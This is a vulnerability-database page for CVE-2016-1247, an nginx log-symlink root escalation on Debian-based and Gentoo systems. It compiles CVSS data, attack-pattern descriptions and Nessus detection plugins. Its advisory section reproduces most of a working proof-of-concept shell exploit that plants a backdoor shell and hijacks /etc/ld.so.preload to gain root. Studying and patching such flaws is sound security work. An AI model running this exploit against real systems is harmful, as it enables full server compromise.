CVE-2016-1247 - Link Following vulnerability in multiple products

CVSS 7.8 - HIGH (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

Attack vector: LOCAL
Attack complexity: LOW
Privileges required: LOW
Confidentiality impact: HIGH
Integrity impact: HIGH
Availability impact: HIGH

Tags: local, low complexity, f5, fedoraproject, CWE-59, nessus, exploit available

Summary

The nginx package before 1.6.2-5+deb8u3 on Debian jessie, the nginx packages before 1.4.6-1ubuntu3.6 on Ubuntu 14.04 LTS, before 1.10.0-0ubuntu0.16.04.3 on Ubuntu 16.04 LTS, and before 1.10.1-0ubuntu1.1 on Ubuntu 16.10, and the nginx ebuild before 1.10.2-r3 on Gentoo allow local users with access to the web server user account to gain root privileges via a symlink attack on the error log.

Vulnerable Configurations

Part         Description     Count
Application  F5              463
OS           Canonical       3
OS           Debian          1
OS           Fedoraproject   3

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Symlink Attack
    An attacker positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name. The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications. In some variants of this attack the attacker may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the attacker may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the attacker to control the actions of the target or to cause the target to expose information to the attacker. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the attacker would normally have.
  • Accessing, Modifying or Executing Executable Files
    An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

Exploit-Db

description: Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation. CVE-2016-1247. Local exploit for Linux platform
file: exploits/linux/local/40768.sh
id: EDB-ID:40768
last seen: 2016-11-16
modified: 2016-11-16
platform: linux
port:
published: 2016-11-16
reporter: Exploit-DB
source: https://www.exploit-db.com/download/40768/
title: Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation
type: local

Nessus

  • NASL family: Debian Local Security Checks
    NASL id: DEBIAN_DSA-3701.NASL
    description: Dawid Golunski reported the nginx web server packages in Debian suffered from a privilege escalation vulnerability (www-data to root) due to the way log files are handled. This security update changes ownership of the /var/log/nginx directory root. In addition, /var/log/nginx has to be made accessible to local users, and local users may be able to read the log files themselves local until the next logrotate invocation.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 94260
    published: 2016-10-26
    reporter: This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/94260
    title: Debian DSA-3701-1 : nginx - security update
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-3701. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(94260);
      script_version("1.6");
      script_cvs_date("Date: 2018/11/10 11:49:38");
    
      script_cve_id("CVE-2016-1247");
      script_xref(name:"DSA", value:"3701");
    
      script_name(english:"Debian DSA-3701-1 : nginx - security update");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Dawid Golunski reported the nginx web server packages in Debian
    suffered from a privilege escalation vulnerability (www-data to root)
    due to the way log files are handled. This security update changes
    ownership of the /var/log/nginx directory root. In addition,
    /var/log/nginx has to be made accessible to local users, and local
    users may be able to read the log files themselves local until the
    next logrotate invocation."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://packages.debian.org/source/jessie/nginx"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.debian.org/security/2016/dsa-3701"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Upgrade the nginx packages.
    
    For the stable distribution (jessie), this problem has been fixed in
    version 1.6.2-5+deb8u3."
      );
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nginx");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2016/10/25");
      script_set_attribute(attribute:"plugin_publication_date", value:"2016/10/26");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"8.0", prefix:"nginx", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-common", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-doc", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-extras", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-extras-dbg", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-full", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-full-dbg", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-light", reference:"1.6.2-5+deb8u3")) flag++;
    if (deb_check(release:"8.0", prefix:"nginx-light-dbg", reference:"1.6.2-5+deb8u3")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL family: Ubuntu Local Security Checks
    NASL id: UBUNTU_USN-3114-1.NASL
    description: Dawid Golunski discovered that the nginx package incorrectly handled log file permissions. A remote attacker could possibly use this issue to obtain root privileges. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 94289
    published: 2016-10-26
    reporter: Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/94289
    title: Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : nginx vulnerability (USN-3114-1)
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Ubuntu Security Notice USN-3114-1. The text 
    # itself is copyright (C) Canonical, Inc. See 
    # <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered 
    # trademark of Canonical, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(94289);
      script_version("1.6");
      script_cvs_date("Date: 2019/09/18 12:31:46");
    
      script_cve_id("CVE-2016-1247");
      script_xref(name:"USN", value:"3114-1");
    
      script_name(english:"Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : nginx vulnerability (USN-3114-1)");
      script_summary(english:"Checks dpkg output for updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Ubuntu host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Dawid Golunski discovered that the nginx package incorrectly handled
    log file permissions. A remote attacker could possibly use this issue
    to obtain root privileges.
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the Ubuntu security advisory. Tenable
    has attempted to automatically clean and format it as much as possible
    without introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://usn.ubuntu.com/3114-1/"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:nginx-common");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:nginx-core");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:nginx-extras");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:nginx-full");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:nginx-light");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:14.04");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:16.04");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:16.10");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2016/11/29");
      script_set_attribute(attribute:"patch_publication_date", value:"2016/10/25");
      script_set_attribute(attribute:"plugin_publication_date", value:"2016/10/26");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Ubuntu Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/cpu", "Host/Ubuntu", "Host/Ubuntu/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("ubuntu.inc");
    include("misc_func.inc");
    
    if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/Ubuntu/release");
    if ( isnull(release) ) audit(AUDIT_OS_NOT, "Ubuntu");
    release = chomp(release);
    if (! preg(pattern:"^(14\.04|16\.04|16\.10)$", string:release)) audit(AUDIT_OS_NOT, "Ubuntu 14.04 / 16.04 / 16.10", "Ubuntu " + release);
    if ( ! get_kb_item("Host/Debian/dpkg-l") ) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Ubuntu", cpu);
    
    flag = 0;
    
    if (ubuntu_check(osver:"14.04", pkgname:"nginx-common", pkgver:"1.4.6-1ubuntu3.6")) flag++;
    if (ubuntu_check(osver:"14.04", pkgname:"nginx-core", pkgver:"1.4.6-1ubuntu3.6")) flag++;
    if (ubuntu_check(osver:"14.04", pkgname:"nginx-extras", pkgver:"1.4.6-1ubuntu3.6")) flag++;
    if (ubuntu_check(osver:"14.04", pkgname:"nginx-full", pkgver:"1.4.6-1ubuntu3.6")) flag++;
    if (ubuntu_check(osver:"14.04", pkgname:"nginx-light", pkgver:"1.4.6-1ubuntu3.6")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"nginx-common", pkgver:"1.10.0-0ubuntu0.16.04.3")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"nginx-core", pkgver:"1.10.0-0ubuntu0.16.04.3")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"nginx-extras", pkgver:"1.10.0-0ubuntu0.16.04.3")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"nginx-full", pkgver:"1.10.0-0ubuntu0.16.04.3")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"nginx-light", pkgver:"1.10.0-0ubuntu0.16.04.3")) flag++;
    if (ubuntu_check(osver:"16.10", pkgname:"nginx-common", pkgver:"1.10.1-0ubuntu1.1")) flag++;
    if (ubuntu_check(osver:"16.10", pkgname:"nginx-core", pkgver:"1.10.1-0ubuntu1.1")) flag++;
    if (ubuntu_check(osver:"16.10", pkgname:"nginx-extras", pkgver:"1.10.1-0ubuntu1.1")) flag++;
    if (ubuntu_check(osver:"16.10", pkgname:"nginx-full", pkgver:"1.10.1-0ubuntu1.1")) flag++;
    if (ubuntu_check(osver:"16.10", pkgname:"nginx-light", pkgver:"1.10.1-0ubuntu1.1")) flag++;
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_HOLE,
        extra      : ubuntu_report_get()
      );
      exit(0);
    }
    else
    {
      tested = ubuntu_pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "nginx-common / nginx-core / nginx-extras / nginx-full / nginx-light");
    }
    
  • NASL family: Gentoo Local Security Checks
    NASL id: GENTOO_GLSA-201701-22.NASL
    description: The remote host is affected by the vulnerability described in GLSA-201701-22 (NGINX: Privilege escalation). It was discovered that Gentoo's default NGINX installation applied similar problematic permissions on "/var/log/nginx" as Debian (DSA-3701) and is therefore vulnerable to the same attack described in CVE-2016-1247. Impact: A local attacker, who either is already NGINX's system user or belongs to NGINX's group, could potentially escalate privileges. Workaround: Ensure that no untrusted user can create files in directories which are used by NGINX (or an NGINX vhost) to store log files.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 96416
    published: 2017-01-12
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/96416
    title: GLSA-201701-22 : NGINX: Privilege escalation
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Gentoo Linux Security Advisory GLSA 201701-22.
    #
    # The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(96416);
      script_version("3.2");
      script_cvs_date("Date: 2019/04/10 16:10:17");
    
      script_cve_id("CVE-2016-1247");
      script_xref(name:"GLSA", value:"201701-22");
    
      script_name(english:"GLSA-201701-22 : NGINX: Privilege escalation");
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-201701-22
    (NGINX: Privilege escalation)
    
        It was discovered that Gentoo&rsquo;s default NGINX installation applied
          similar problematic permissions on &ldquo;/var/log/nginx&rdquo; as Debian
          (DSA-3701) and is therefore vulnerable to the same attack described in
          CVE-2016-1247.
      
    Impact :
    
        A local attacker, who either is already NGINX&rsquo;s system user or belongs
          to NGINX&rsquo;s group, could potentially escalate privileges.
      
    Workaround :
    
        Ensure that no untrusted user can create files in directories which are
          used by NGINX (or an NGINX vhost) to store log files."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.debian.org/security/2016/dsa-3701"
      );
      # https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?e1440e63"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/201701-22"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "All NGINX users should upgrade to the latest ebuild revision:
          # emerge --sync
          # emerge --ask --oneshot --verbose '>=www-servers/nginx-1.10.2-r3'"
      );
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:nginx");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2017/01/11");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/12");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Gentoo Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
    if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (qpkg_check(package:"www-servers/nginx", unaffected:make_list("ge 1.10.2-r3"), vulnerable:make_list("lt 1.10.2-r3"))) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "NGINX");
    }
    

Packetstorm

data source: https://packetstormsecurity.com/files/download/139750/nginx-escalate.txt
id: PACKETSTORM:139750
last seen: 2017-01-14
published: 2016-11-16
reporter: Dawid Golunski
source: https://packetstormsecurity.com/files/139750/Nginx-Root-Privilege-Escalation.html
title: Nginx Root Privilege Escalation

Seebug

bulletinFamilyexploit
description- Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhackers.com - Release date: 15.11.2016 - Revision 1.0 I. VULNERABILITY ------------------------- Nginx (Debian-based distros) - Root Privilege Escalation Fixed in 1.6.2-5+deb8u3 package on Debian, and 1.10.0-0ubuntu0.16.04.3 on Ubuntu 16.04 LTS Update 11.01.2017: Gentoo and its nginx packages were also found affected by this vulnerability: https://security.gentoo.org/glsa/201701-22 II. BACKGROUND ------------------------- "nginx [engine x] is an HTTP and reverse proxy server, a mail proxy server, and a generic TCP/UDP proxy server, originally written by Igor Sysoev. For a long time, it has been running on many heavily loaded Russian sites including Yandex, Mail.Ru, VK, and Rambler. According to Netcraft, nginx served or proxied 27.80% busiest sites in October 2016. Here are some of the success stories: Netflix, Wordpress.com, FastMail.FM." https://nginx.org/en/ III. INTRODUCTION ------------------------- Nginx web server packaging on Debian-based distributions such as Debian or Ubuntu was found to create log directories with insecure permissions which can be exploited by malicious local attackers to escalate their privileges from nginx/web user (www-data) to root. The vulnerability could be easily exploited by attackers who have managed to compromise a web application hosted on Nginx server and gained access to www-data account as it would allow them to escalate their privileges further to root access and fully compromise the system. IV. DESCRIPTION ------------------------- Nginx installed from default repositories on Debian-based systems (Debian, Ubuntu etc.) 
create nginx log directory at the following location and with the following permissions: ``` root@xenial:~# ls -ld /var/log/nginx/ drwxr-x--- 2 www-data adm 4096 Nov 12 22:32 /var/log/nginx/ root@xenial:~# ls -ld /var/log/nginx/* -rw-r----- 1 www-data adm 0 Nov 12 22:31 /var/log/nginx/access.log -rw-r--r-- 1 root root 0 Nov 12 22:47 /var/log/nginx/error.log ``` As the /var/log/nginx directory is owned by www-data, it is possible for local attackers who have gained access to the system through a vulnerability in a web application running on Nginx (or the server itself) to replace the log files with a symlink to an arbitrary file. Upon nginx startup/restart the logs would be written to the file pointed to by the symlink. This allows attackers to escalate privileges to root. Attackers who have managed to replace the log file with a symlink would have to wait for nginx daemon to re-open the log files. For this to happen nginx service needs to be restarted, or the daemon needs to receive a USR1 process signal. However, the USR1 is sent automatically on default installations of Debian-based systems through logrotate script which calls do_rotate() function as can be seen in the files quoted below: ``` --------[ /etc/logrotate.d/nginx ]-------- /var/log/nginx/*.log { daily missingok rotate 52 compress delaycompress notifempty create 0640 www-data adm sharedscripts prerotate if [ -d /etc/logrotate.d/httpd-prerotate ]; then \ run-parts /etc/logrotate.d/httpd-prerotate; \ fi \ endscript postrotate invoke-rc.d nginx rotate >/dev/null 2>&1 endscript } ------------------------------------------ ``` ``` ----------[ /etc/init.d/nginx ]----------- [...] do_rotate() { start-stop-daemon --stop --signal USR1 --quiet --pidfile $PID --name $NAME return 0 } [...] ----------------------------------------- ``` The logrotation script is called daily by cron.daily on default Ubuntu/Debian installations at 6:25am every day. 
If /etc/logrotate.d/nginx has been set to rotate logs 'daily' then attacker could gain root privileges within 24h upon the next log rotation without any system admin interaction. V. PROOF OF CONCEPT EXPLOIT ------------------------- ``` ------------[ nginxed-root.sh ]-------------- #!/bin/bash # # Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit # nginxed-root.sh (ver. 1.0) # # CVE-2016-1247 # # Discovered and coded by: # # Dawid Golunski # dawid[at]legalhackers.com # # https://legalhackers.com # # Follow https://twitter.com/dawid_golunski for updates on this advisory. # # --- # This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu # etc.) to escalate their privileges from nginx web server user (www-data) to root # through unsafe error log handling. # # The exploit waits for Nginx server to be restarted or receive a USR1 signal. # On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx) # script which is called daily by the cron.daily on default installations. # The restart should take place at 6:25am which is when cron.daily executes. # Attackers can therefore get a root shell automatically in 24h at most without any admin # interaction just by letting the exploit run till 6:25am assuming that daily logrotation # has been configured. # # # Exploit usage: # ./nginxed-root.sh path_to_nginx_error.log # # To trigger logrotation for testing the exploit, you can run the following command: # # /usr/sbin/logrotate -vf /etc/logrotate.d/nginx # # See the full advisory for details at: # https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html # # Video PoC: # https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html # # # Disclaimer: # For testing purposes only. Do no harm. 
#
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/nginxrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

function cleanexit {
    # Cleanup
    echo -e "\n[+] Cleaning up..."
    rm -f $PRIVESCSRC
    rm -f $PRIVESCLIB
    rm -f $ERRORLOG
    touch $ERRORLOG
    if [ -f /etc/ld.so.preload ]; then
        echo -n > /etc/ld.so.preload
    fi
    echo -e "\n[+] Job done. Exiting with code $1 \n"
    exit $1
}

function ctrl_c() {
    echo -e "\n[+] Ctrl+C pressed"
    cleanexit 0
}

#intro
cat <<_eascii_
 _______________________________
< Is your server (N)jinxed ? ;o >
 -------------------------------
                         \
                          \
                           __---__
                        _-       /--______
                   __--( /     \ )XXXXXXXXXXX\v.
                 .-XXX(   O   O  )XXXXXXXXXXXXXXX-
                /XXX(       U     )        XXXXXXX\
              /XXXXX(              )--_  XXXXXXXXXXX\
             /XXXXX/ (      O     )   XXXXXX   \XXXXX\
             XXXXX/   /            XXXXXX   \__ \XXXXX
             XXXXXX__/          XXXXXX         \__---->
     ---___  XXX__/          XXXXXX      \__         /
       \-  --__/   ___/\  XXXXXX            /  ___--/=
        \-\    ___/    XXXXXX              '--- XXXXXX
           \-\/XXX\ XXXXXX                      /XXXXX
             \XXXXXXXXX   \                    /XXXXX/
              \XXXXXX      >                 _/XXXXX/
                \XXXXX--__/              __-- XXXX/
                  -XXXXXXXX---------------  XXXXXX-
                     \XXXXXXXXXXXXXXXXXXXXXXXXXX/
                       ""VXXXXXXXXXXXXXXXXXXV""
_eascii_
echo -e "\033[94m \nNginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) \nnginxed-root.sh (ver. 1.0)\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"

# Args
if [ $# -lt 1 ]; then
    echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"
    echo -e "It seems that this server uses: `ps aux | grep nginx | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"
    exit 3
fi

# Priv check
echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"
id | grep -q www-data
if [ $? -ne 0 ]; then
    echo -e "\n[!] You need to execute the exploit as www-data user! Exiting.\n"
    exit 3
fi

# Set target paths
ERRORLOG="$1"
if [ ! -f $ERRORLOG ]; then
    echo -e "\n[!] The specified Nginx error log ($ERRORLOG) doesn't exist. Try again.\n"
    exit 3
fi

# [ Exploitation ]
trap ctrl_c INT

# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
uid_t geteuid(void) {
    static uid_t (*old_geteuid)();
    old_geteuid = dlsym(RTLD_NEXT, "geteuid");
    if ( old_geteuid() == 0 ) {
        chown("$BACKDOORPATH", 0, 0);
        chmod("$BACKDOORPATH", 04777);
        unlink("/etc/ld.so.preload");
    }
    return old_geteuid();
}
_solibeof_
/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
if [ $? -ne 0 ]; then
    echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
    cleanexit 2;
fi

# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"

# Safety check
if [ -f /etc/ld.so.preload ]; then
    echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
    exit 2
fi

# Symlink the log file
rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG
if [ $? -ne 0 ]; then
    echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
    cleanexit 3
fi
echo -e "\n[+] The server appears to be \033[94m(N)jinxed\033[0m (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`"

# Make sure the nginx access.log contains at least 1 line for the logrotation to get triggered
curl http://localhost/ >/dev/null 2>/dev/null

# Wait for Nginx to re-open the logs/USR1 signal after the logrotation (if daily
# rotation is enabled in logrotate config for nginx, this should happen within 24h at 6:25am)
echo -ne "\n[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am..."
while :; do
    sleep 1
    if [ -f /etc/ld.so.preload ]; then
        echo $PRIVESCLIB > /etc/ld.so.preload
        rm -f $ERRORLOG
        break;
    fi
done

# /etc/ld.so.preload should be owned by www-data user at this point

# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
